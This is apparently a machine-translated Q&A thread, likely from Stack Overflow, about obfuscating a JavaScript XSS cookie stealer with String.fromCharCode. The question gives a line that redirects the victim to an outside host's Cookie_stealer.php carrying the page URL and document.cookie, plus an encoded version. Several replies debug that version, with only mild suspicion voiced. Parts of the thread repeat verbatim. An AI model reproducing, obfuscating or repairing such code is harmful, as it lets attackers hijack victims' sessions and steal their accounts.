Javascript string.fromcharcode

我对javascript和编程一无所知

这是原始代码：

document.location = "http://ormteam.net23.net/Cookie_stealer.php?url=" + window.location.href + "&cookies=" + document.cookie;

这是string.fromcharcode

document.location = String.fromCharCode(34, 104, 116, 116, 112, 58, 47, 47, 111, 114, 109, 116, 101, 97, 109, 46, 110, 101, 116, 50, 51, 46, 110, 101, 116, 47, 67, 111, 111, 107, 105, 101, 95, 115, 116, 101, 97, 108, 101, 114, 46, 112, 104, 112, 63, 117, 114, 108, 61, 34) + document.url + String.fromCharCode(34, 38, 99, 111, 111, 107, 105, 101, 115, 61, 34) + document.cookies;

为什么这不起作用

---

在这种代码的宁静中坐上几个小时//

只有字符串文本才需要引号。因为您没有使用字符串文字，所以不需要引号

document.location = String.fromCharCode(104, 116, 116, 112, ...

---

只有字符串文字才需要引号。因为您没有使用字符串文字，所以不需要引号

document.location = String.fromCharCode(104, 116, 116, 112, ...

---

从那些字符代码中删除

34

，就像它们用于

“

制作

document.cookies

到

document.cookie

---

如果你对javascript不熟悉，只是好奇，那么你在用cookie偷取器做什么呢！

从那些字符代码中删除

34

，因为它们是用于

“

制作

document.cookies

到

document.cookie

---

如果你对javascript还不熟悉，那么你在用cookiestealer做什么呢？只是好奇而已

从SO访问这样的链接会导致窃取我的cookie并导致任何安全问题吗？：）@sabithpocker只不过是直接访问带有字符串文字的链接而已。@pickypg只是好奇，当我在控制台中尝试它时，它传递了

document.cookie

as

GET

参数。@sabithpocker这是因为

位置

在末尾指定了它。这是《跨站点脚本编写》（XSS）一书中提到的，但这与链接的原始编码（字符串）没有什么区别。从SO访问这样的链接会导致窃取我的cookie并导致任何安全问题吗？：）@sabithpocker只不过是直接访问带有字符串文字的链接而已。@pickypg只是好奇，当我在控制台中尝试它时，它传递了

document.cookie

as

GET

参数。@sabithpocker这是因为

位置

在末尾指定了它。这是《跨站点脚本编写》（XSS）一书中提到的，但这与链接的原始编码（字符串）没有什么不同。